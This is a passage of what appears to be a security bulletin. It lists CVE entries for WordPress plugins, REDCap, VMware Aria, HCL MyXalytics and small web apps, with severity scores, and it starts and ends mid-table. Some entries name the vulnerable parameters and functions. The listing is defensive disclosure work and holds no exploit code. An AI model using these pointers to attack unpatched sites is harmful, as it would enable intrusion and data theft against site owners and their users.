The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Pricing Table widget in all versions up to, and including, 2.10.43 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-10 | 6.4 | CVE-2025-0311 |
| themepoints--Service Box |
The Service Box plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-12699 |
| ThemePoints--Skill Bar |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemePoints Skill Bar allows Stored XSS.This issue affects Skill Bar: from n/a through 1.2. | 2025-01-09 | 6.5 | CVE-2025-22805 |
| themesflat--Themesflat Addons For Elementor |
The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the TF E Slider Widget in all versions up to, and including, 2.2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-08 | 6.4 | CVE-2024-12205 |
| ThemeSupport--Hide Category by User Role for WooCommerce |
Missing Authorization vulnerability in ThemeSupport Hide Category by User Role for WooCommerce.This issue affects Hide Category by User Role for WooCommerce: from n/a through 2.1.1. | 2025-01-07 | 4.3 | CVE-2024-56272 |
| ThimPress--Thim Elementor Kit |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThimPress Thim Elementor Kit allows DOM-Based XSS.This issue affects Thim Elementor Kit: from n/a through 1.2.8. | 2025-01-07 | 6.5 | CVE-2025-22312 |
| tinuzz--Trackserver |
The Trackserver plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tsmap' shortcode in all versions up to, and including, 5.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-11 | 6.4 | CVE-2024-12505 |
| Tips and Tricks HQ--Compact WP Audio Player |
Server-Side Request Forgery (SSRF) vulnerability in Tips and Tricks HQ Compact WP Audio Player allows Server Side Request Forgery.This issue affects Compact WP Audio Player: from n/a through 1.9.14. | 2025-01-07 | 6.4 | CVE-2024-56279 |
| tobias_conrad--Design for Contact Form 7 Style WordPress Plugin CF7 WOW Styler |
The The Design for Contact Form 7 Style WordPress Plugin - CF7 WOW Styler plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.7.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. This functionality is also vulnerable to Reflected Cross-Site Scripting. Version 1.7.0 patched the Reflected XSS issue, however, the arbitrary shortcode execution issue remains. | 2025-01-07 | 6.5 | CVE-2024-12419 |
| transportersio--Transporters.io |
The Transporters.io plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.84. This is due to missing nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-12557 |
| TXOne Networks--Portable Inspector |
Improper Input Validation vulnerability in Management Program in TXOne Networks Portable Inspector and Portable Inspector Pro Edition allows remote attacker to crash management service. The Denial of Service situation can be resolved by restarting the management service. This issue affects Portable Inspector: through 1.0.0; Portable Inspector Pro Edition: through 1.0.0. | 2025-01-08 | 5.3 | CVE-2024-47934 |
| unitecms--Unlimited Elements For Elementor |
The Unlimited Elements For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.5.135 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note: Since the widget code isn't part of the code, to apply the patch, the affected widgets: Image Tooltip, Notification, Simple Popup, Video Play Button, and Card Carousel, must be deleted and reinstalled manually. | 2025-01-09 | 6.4 | CVE-2024-13153 |
| Unknown--Aklamator INfeed |
The Aklamator INfeed WordPress plugin through 2.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2025-01-09 | 6.1 | CVE-2024-12731 |
| Unknown--Aklamator INfeed |
The Aklamator INfeed WordPress plugin through 2.0.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2025-01-09 | 4.8 | CVE-2024-12717 |
| Unknown--Asgard Security Scanner |
The Asgard Security Scanner WordPress plugin through 0.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2025-01-09 | 6.1 | CVE-2024-12715 |
| Unknown--Auto iFrame |
The Auto iFrame WordPress plugin before 2.0 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. | 2025-01-08 | 5.4 | CVE-2024-10151 |
| Unknown--Backlink Monitoring Manager |
The Backlink Monitoring Manager WordPress plugin through 0.1.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2025-01-09 | 6.1 | CVE-2024-12714 |
| Unknown--BU Section Editing |
The BU Section Editing WordPress plugin through 0.9.9 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2025-01-09 | 6.1 | CVE-2024-12736 |
| Unknown--Category Posts Widget |
The Category Posts Widget WordPress plugin before 4.9.18 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2025-01-07 | 4.8 | CVE-2024-9638 |
| Unknown--Email Subscribers by Icegram Express |
The Email Subscribers by Icegram Express WordPress plugin before 5.7.44 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks | 2025-01-06 | 6.5 | CVE-2024-12311 |
| Unknown--Icegram Engage |
The Icegram Engage WordPress plugin before 3.1.32 does not sanitise and escape some of its Campaign settings, which could allow authors and above to perform Stored Cross-Site Scripting attacks | 2025-01-06 | 6.1 | CVE-2024-12302 |
| Unknown--Pods |
The Pods WordPress plugin before 3.2.8.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2025-01-06 | 6.1 | CVE-2024-11849 |
| Unknown--PostLists |
The PostLists WordPress plugin through 2.0.2 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers | 2025-01-09 | 4.2 | CVE-2024-10815 |
| Unknown--Property Hive |
The Property Hive WordPress plugin before 2.1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2025-01-08 | 6.1 | CVE-2024-12585 |
| Unknown--Tabs Shortcode |
The Tabs Shortcode WordPress plugin through 2.0.2 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. | 2025-01-07 | 5.3 | CVE-2024-11606 |
| Unknown--tourmaster |
The tourmaster WordPress plugin before 5.3.4 does not sanitise and escape some parameters when outputting them in the page, which could allow unauthenticated users to perform Cross-Site Scripting attacks. | 2025-01-06 | 6.1 | CVE-2024-11356 |
| Unknown--WordPress Auction Plugin |
The WordPress Auction Plugin WordPress plugin through 3.7 does not sanitise and escape some of its settings, which could allow high privilege users such as editors to perform Stored Cross-Site Scripting attacks. | 2025-01-07 | 4.8 | CVE-2024-8857 |
| upress--Enable Accessibility |
The Enable Accessibility plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.4.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-9208 |
| uptodown--Uptodown APK Download Widget |
The Uptodown APK Download Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'utd-widget' shortcode in all versions up to, and including, 0.1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-12453 |
| Vanderbilt--REDCap |
An issue was discovered in REDCap 14.9.6. A Reflected cross-site scripting (XSS) vulnerability in the email-subject field exists while performing an upload of a CSV file containing a list of alert configurations. An attacker can send the victim a CSV file containing the XSS payload in the email-subject. Once the victim uploads the file, he automatically lands on a page to view the uploaded data. If the victim clicks on the email-subject value, it triggers the XSS payload. | 2025-01-10 | 6.1 | CVE-2025-23110 |
| Vanderbilt--REDCap |
An issue was discovered in REDCap 14.9.6. A stored cross-site scripting (XSS) vulnerability allows authenticated users to inject malicious scripts into the Survey field name of Survey. When a user receive the survey, if he clicks on the field name, it triggers the XSS payload. | 2025-01-10 | 6.1 | CVE-2025-23112 |
| Vanderbilt--REDCap |
A stored cross-site scripting (XSS) vulnerability in the built-in messenger of REDCap 14.9.6 allows authenticated users to inject malicious scripts into the message field. When a user click on the received message, the crafted payload is executed, potentially enabling the execution of arbitrary web scripts. | 2025-01-09 | 5.4 | CVE-2024-56376 |
| Vanderbilt--REDCap |
A stored cross-site scripting (XSS) vulnerability in survey titles of REDCap 14.9.6 allows authenticated users to inject malicious scripts into the Survey Title field or Survey Instructions. When a user receives a survey and clicks anywhere on the survey page to enter data, the crafted payload (which has been injected into all survey fields) is executed, potentially enabling the execution of arbitrary web scripts. | 2025-01-09 | 5.4 | CVE-2024-56377 |
| Vanderbilt--REDCap |
An issue was discovered in REDCap 14.9.6. It allows HTML Injection via the Survey field name, exposing users to a redirection to a phishing website. An attacker can exploit this to trick the user that receives the survey into clicking on the field name, which redirects them to a phishing website. Thus, this allows malicious actions to be executed without user consent. | 2025-01-10 | 4.7 | CVE-2025-23111 |
| Venutius--BP Profile Shortcodes Extra |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Venutius BP Profile Shortcodes Extra allows Stored XSS.This issue affects BP Profile Shortcodes Extra: from n/a through 2.6.0. | 2025-01-09 | 6.5 | CVE-2025-22817 |
| vfthemes--StorePress |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in vfthemes StorePress allows DOM-Based XSS.This issue affects StorePress: from n/a through 1.0.12. | 2025-01-09 | 6.5 | CVE-2025-22821 |
| vickydalmia--Coupon Plugin |
The Coupon Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Coupon Code' parameter in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-12516 |
| VillaTheme--Advanced Product Information for WooCommerce |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VillaTheme Advanced Product Information for WooCommerce allows Stored XSS.This issue affects Advanced Product Information for WooCommerce: from n/a through 1.1.4. | 2025-01-09 | 6.5 | CVE-2025-22803 |
| virgial--Bootstrap Blocks for WP Editor v2 |
The Bootstrap Blocks for WP Editor v2 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'gtb-bootstrap/column' block in all versions up to, and including, 2.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-07 | 6.4 | CVE-2024-12495 |
| VIWIS--LMS |
A vulnerability has been found in VIWIS LMS 9.11 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component File Upload. The manipulation of the argument filename leads to cross site scripting. The attack can be launched remotely. Upgrading to version 9.12 is able to address this issue. It is recommended to upgrade the affected component. | 2025-01-08 | 4.3 | CVE-2024-8002 |
| VMware--VMware Aria Automation |
VMware Aria Automation contains a server-side request forgery (SSRF) vulnerability. A malicious actor with "Organization Member" access to Aria Automation may exploit this vulnerability enumerate internal services running on the host/network. | 2025-01-08 | 4.3 | CVE-2025-22215 |
| wander-chu--SpringBoot-Blog |
A vulnerability has been found in wander-chu SpringBoot-Blog 1.0 and classified as critical. This vulnerability affects the function upload of the file src/main/java/com/my/blog/website/controller/admin/AttachtController.java of the component Admin Attachment Handler. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-09 | 4.7 | CVE-2024-13201 |
| wc1c--WC1C |
The WC1C plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 0.23.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-11375 |
| web-mv--ResAds |
The ResAds plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via multiple parameters in all versions up to, and including, 2.0.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-09 | 6.1 | CVE-2024-12122 |
| webwirkung--Shipping via Planzer for WooCommerce |
The Shipping via Planzer for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'processed-ids' parameter in all versions up to, and including, 1.0.25 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-08 | 6.1 | CVE-2024-12337 |
| wordlift--WordLift AI powered SEO Schema |
The WordLift - AI powered SEO - Schema plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the 'wl_config_plugin' AJAX action in all versions up to, and including, 3.54.0. This makes it possible for unauthenticated attackers to update the plugin's settings. | 2025-01-07 | 5.3 | CVE-2024-12176 |
| WORDPRESTEEM--WE Blocks |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WORDPRESTEEM WE Blocks allows Stored XSS.This issue affects WE Blocks: from n/a through 1.3.5. | 2025-01-07 | 6.5 | CVE-2025-22529 |
| wow-analytics--GatorMail SmartForms |
The GatorMail SmartForms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gatormailsmartform' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-11 | 6.4 | CVE-2024-11386 |
| WP OnlineSupport, Essential Plugin--Hero Banner Ultimate |
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in WP OnlineSupport, Essential Plugin Hero Banner Ultimate allows PHP Local File Inclusion.This issue affects Hero Banner Ultimate: from n/a through 1.4.2. | 2025-01-07 | 6.5 | CVE-2025-22305 |
| WP Wand--WP Wand |
Missing Authorization vulnerability in WP Wand WP Wand allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Wand: from n/a through 1.2.5. | 2025-01-07 | 5.3 | CVE-2025-22302 |
| WPBits--WPBITS Addons For Elementor Page Builder |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPBits WPBITS Addons For Elementor Page Builder allows Stored XSS.This issue affects WPBITS Addons For Elementor Page Builder: from n/a through 1.5.1. | 2025-01-07 | 6.5 | CVE-2024-56285 |
| WPBits--WPBITS Addons For Elementor Page Builder |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPBits WPBITS Addons For Elementor Page Builder allows Stored XSS.This issue affects WPBITS Addons For Elementor Page Builder: from n/a through 1.5.1. | 2025-01-07 | 5.9 | CVE-2025-22316 |
| wpchill--Passster Password Protect Pages and Content |
The Passster - Password Protect Pages and Content plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.2.10 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator. | 2025-01-07 | 5.3 | CVE-2024-11282 |
| wpchill--RSVP and Event Management |
The RSVP and Event Management plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several AJAX functions like bulk_delete_attendees() and bulk_delete_questions() in all versions up to, and including, 2.7.13. This makes it possible for unauthenticated attackers to delete questions and attendees and for authenticated users to update question menu orders. | 2025-01-07 | 5.3 | CVE-2024-12711 |
| wpdevart--Booking calendar, Appointment Booking System |
The Booking Calendar and Booking Calendar Pro plugins for WordPress are vulnerable to Reflected Cross-Site Scripting via the 'calendar_id' parameter in all versions up to, and including, 3.2.19 and 11.2.19 respectively, due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-07 | 6.1 | CVE-2024-12077 |
| wpdevelop, oplugins--Email Reminders |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpdevelop, oplugins Email Reminders allows Stored XSS.This issue affects Email Reminders: from n/a through 2.0.5. | 2025-01-07 | 5.9 | CVE-2024-56292 |
| WPDeveloper--Typing Text |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPDeveloper Typing Text allows Stored XSS.This issue affects Typing Text: from n/a through 1.2.7. | 2025-01-07 | 6.5 | CVE-2025-22315 |
| wpdevteam--Essential Blocks Page Builder Gutenberg Blocks, Patterns & Templates |
The Essential Blocks - Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the maker title value of the Google Maps block in all versions up to, and including, 5.0.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-01-08 | 4.4 | CVE-2024-12045 |
| wpecommerce, wp.insider--Sell Digital Downloads |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpecommerce, wp.insider Sell Digital Downloads allows Stored XSS.This issue affects Sell Digital Downloads: from n/a through 2.2.7. | 2025-01-09 | 6.5 | CVE-2025-22826 |
| WPForms--Contact Form by WPForms |
Missing Authorization vulnerability in WPForms Contact Form by WPForms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Contact Form by WPForms: from n/a through 1.9.2.2. | 2025-01-07 | 4.3 | CVE-2024-56276 |
| wpjobportal--WP Job Portal A Complete Recruitment System for Company or Job Board website |
The WP Job Portal - A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.2.5 due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to submit resumes for other applicants when applying for jobs. | 2025-01-07 | 4.3 | CVE-2024-12131 |
| wpqode--FancyPost Best Ultimate Post Block, Post Grid, Layouts, Carousel, Slider For Gutenberg & Elementor |
The FancyPost - Best Ultimate Post Block, Post Grid, Layouts, Carousel, Slider For Gutenberg & Elementor plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the handle_block_shortcode_export() function in all versions up to, and including, 6.0.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to export shortcodes. | 2025-01-07 | 4.3 | CVE-2024-10536 |
| wpsoul--Greenshift animation and page builder blocks |
The Greenshift - animation and page builder blocks plugin for WordPress is vulnerable to Authenticated (Subscriber+) Server-Side Request Forgery and Stored Cross Site Scripting in all versions up to, and including, 9.0.0 due to a missing capability check in the greenshift_download_file_localy function, along with no SSRF protection and sanitization on uploaded SVG files. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application that can also be leveraged to download malicious SVG files containing Cross-Site Scripting payloads to the server. On Cloud-based servers, attackers could retrieve the instance metadata. The issue was partially patched in version 8.9.9 and fully patched in version 9.0.1. | 2025-01-09 | 6.4 | CVE-2024-6155 |
| wptravel--WP Travel Ultimate Travel Booking System, Tour Management Engine |
The WP Travel - Ultimate Travel Booking System, Tour Management Engine plugin for WordPress is vulnerable to SQL Injection via the 'booking_itinerary' parameter of the 'wptravel_get_booking_data' function in all versions up to, and including, 10.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-01-09 | 6.5 | CVE-2024-12067 |
| WPvivid Backup & Migration--WPvivid Backup and Migration |
Missing Authorization vulnerability in WPvivid Backup & Migration WPvivid Backup and Migration allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects WPvivid Backup and Migration: from n/a through 0.9.106. | 2025-01-07 | 4.3 | CVE-2024-56273 |
| xpro--140+ Widgets | Xpro Addons For Elementor FREE |
The 140+ Widgets | Xpro Addons For Elementor - FREE plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.6.2 via the 'duplicate' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract potentially sensitive data from draft, scheduled (future), private, and password protected posts. | 2025-01-08 | 4.3 | CVE-2024-12584 |
| yudiz--WP Menu Image |
The WP Menu Image plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wmi_delete_img_menu' function in all versions up to, and including, 2.2. This makes it possible for unauthenticated attackers to delete images from menus. | 2025-01-07 | 5.3 | CVE-2024-12022 |
| yumpu--Yumpu E-Paper publishing |
The Yumpu E-Paper publishing plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'YUMPU' shortcode in all versions up to, and including, 3.0.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-09 | 6.4 | CVE-2024-12621 |
| ZeroWdd--myblog |
A vulnerability classified as critical was found in ZeroWdd myblog 1.0. This vulnerability affects unknown code of the file src/main/resources/mapper/BlogMapper.xml. The manipulation of the argument findBlogList/getTotalBlogs leads to xml injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-08 | 6.3 | CVE-2024-13190 |
| ZeroWdd--myblog |
A vulnerability, which was classified as critical, has been found in ZeroWdd myblog 1.0. This issue affects the function upload of the file src/main/java/com/wdd/myblog/controller/admin/uploadController.java. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-08 | 6.3 | CVE-2024-13191 |
| zhenfeng13--My-Blog |
A vulnerability classified as critical has been found in zhenfeng13 My-Blog 1.0. Affected is the function uploadFileByEditomd of the file src/main/java/com/site/blog/my/core/controller/admin/BlogController.java. The manipulation of the argument editormd-image-file leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-06 | 6.3 | CVE-2024-13144 |
| zhenfeng13--My-Blog |
A vulnerability classified as critical was found in zhenfeng13 My-Blog 1.0. Affected by this vulnerability is the function upload of the file src/main/java/com/site/blog/my/core/controller/admin/uploadController. java. The manipulation of the argument file leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-06 | 6.3 | CVE-2024-13145 |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| CampCodes--Computer Laboratory Management System |
A vulnerability, which was classified as problematic, was found in CampCodes Computer Laboratory Management System 1.0. This affects an unknown part of the file /class/edit/edit. The manipulation of the argument s_lname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2025-01-09 | 3.5 | CVE-2025-0342 |
| CampCodes--DepEd Equipment Inventory System |
A vulnerability was found in CampCodes DepEd Equipment Inventory System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /data/add_employee.php. The manipulation of the argument data leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-09 | 3.5 | CVE-2025-0348 |
| clevelandwebdeveloper--Spacer |
The Spacer plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the motech_spacer_callback() function in all versions up to, and including, 3.0.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view limited setting information. | 2025-01-07 | 3.1 | CVE-2024-10527 |
| code-projects--Online Bike Rental |
A vulnerability classified as problematic has been found in code-projects Online Bike Rental 1.0. Affected is an unknown function of the file /vehical-details.php of the component HTTP GET Request Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. | 2025-01-09 | 3.5 | CVE-2025-0339 |
| code-projects--Online Book Shop |
A vulnerability was found in code-projects Online Book Shop 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /booklist.php?subcatid=1. The manipulation of the argument subcatnm leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-07 | 3.5 | CVE-2025-0295 |
| code-projects--Online Book Shop |
A vulnerability, which was classified as problematic, has been found in code-projects Online Book Shop 1.0. Affected by this issue is some unknown functionality of the file /subcat.php. The manipulation of the argument catnm leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-07 | 3.5 | CVE-2025-0301 |
| donglight--bookstore |
A vulnerability was found in donglight bookstore电商书城系统说明 1.0.0. It has been declared as problematic. This vulnerability affects the function BookSearchList of the file src/main/java/org/zdd/bookstore/web/controller/BookInfoController.java. The manipulation of the argument keywords leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-09 | 3.5 | CVE-2024-13196 |
| donglight--bookstore |
A vulnerability was found in donglight bookstore电商书城系统说明 1.0.0. It has been rated as problematic. This issue affects the function updateUser of the file src/main/Java/org/zdd/bookstore/web/controller/admin/AdminUserControlle.java. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-09 | 3.5 | CVE-2024-13197 |
| Drupal--Acquia DAM |
Cross-Site Request Forgery (CSRF) vulnerability in Drupal Acquia DAM allows Cross Site Request Forgery.This issue affects Acquia DAM: from 0.0.0 before 1.0.13, from 1.1.0 before 1.1.0-beta3. | 2025-01-09 | 3.5 | CVE-2024-13261 |
| Drupal--POST File |
Cross-Site Request Forgery (CSRF) vulnerability in Drupal POST File allows Cross Site Request Forgery.This issue affects POST File: from 0.0.0 before 1.0.2. | 2025-01-09 | 3.1 | CVE-2024-13293 |
| HCL Software--DRYiCE MyXalytics |
HCL MyXalytics is affected by username enumeration vulnerability. This allows a malicious user to perform enumeration of application users, and therefore compile a list of valid usernames. | 2025-01-11 | 3.7 | CVE-2024-42174 |
| HCL Software--DRYiCE MyXalytics |
HCL MyXalytics is affected by a weak input validation vulnerability. The application accepts special characters and there is no length validation. This can lead to security vulnerabilities like SQL injection, XSS, and buffer overflow. | 2025-01-11 | 2.6 | CVE-2024-42175 |
| HCL Software--DRYiCE MyXalytics |
HCL MyXalytics is affected by sensitive information disclosure vulnerability. The HTTP response header exposes the Microsoft-HTTP API∕2.0 as the server's name & version. | 2025-01-12 | 2 | CVE-2024-42179 |
| HCL Software--DRYiCE MyXalytics |
HCL MyXalytics is affected by a malicious file upload vulnerability. The application accepts invalid file uploads, including incorrect content types, double extensions, null bytes, and special characters, allowing attackers to upload and execute malicious files. | 2025-01-12 | 1.6 | CVE-2024-42180 |
| HCL Software--DRYiCE MyXalytics |
HCL MyXalytics is affected by a cleartext transmission of sensitive information vulnerability. The application transmits sensitive or security-critical data in cleartext in a communication channel that can be sniffed by unauthorized actors. | 2025-01-12 | 1.6 | CVE-2024-42181 |
| Hewlett Packard Enterprise (HPE)--AOS-CX |
A vulnerability in the firewall component of HPE Aruba Networking CX 10000 Series Switches exists. It could allow an unauthenticated adjacent attacker to conduct a packet forwarding attack against the ICMP and UDP protocol. For this attack to be successful an attacker requires a switch configuration that allows packets routing (at layer 3). Configurations that do not allow network traffic routing are not impacted. Successful exploitation could allow an attacker to bypass security policies, potentially leading to unauthorized data exposure. | 2025-01-08 | 3.4 | CVE-2024-54010 |
| IBM--Controller |
IBM Cognos Controller 11.0.0 through 11.0.1 and IBM Controller 11.1.0 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. | 2025-01-07 | 3.7 | CVE-2021-20455 |
| IBM--DevOps Deploy |
IBM UrbanCode Deploy (UCD) 7.2 through 7.2.3.13, 7.3 through 7.3.2.8, and IBM DevOps Deploy 8.0 through 8.0.1.3 are vulnerable to HTML injection. This vulnerability may allow a user to embed arbitrary HTML tags in the Web UI potentially leading to sensitive information disclosure. | 2025-01-06 | 3.1 | CVE-2024-51472 |
| kurniaramadhan--E-Commerce-PHP |
A vulnerability was found in kurniaramadhan E-Commerce-PHP 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /admin/create_product.php of the component Create Product Page. The manipulation of the argument Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-09 | 2.4 | CVE-2024-13205 |
| langhsu--Mblog Blog System |
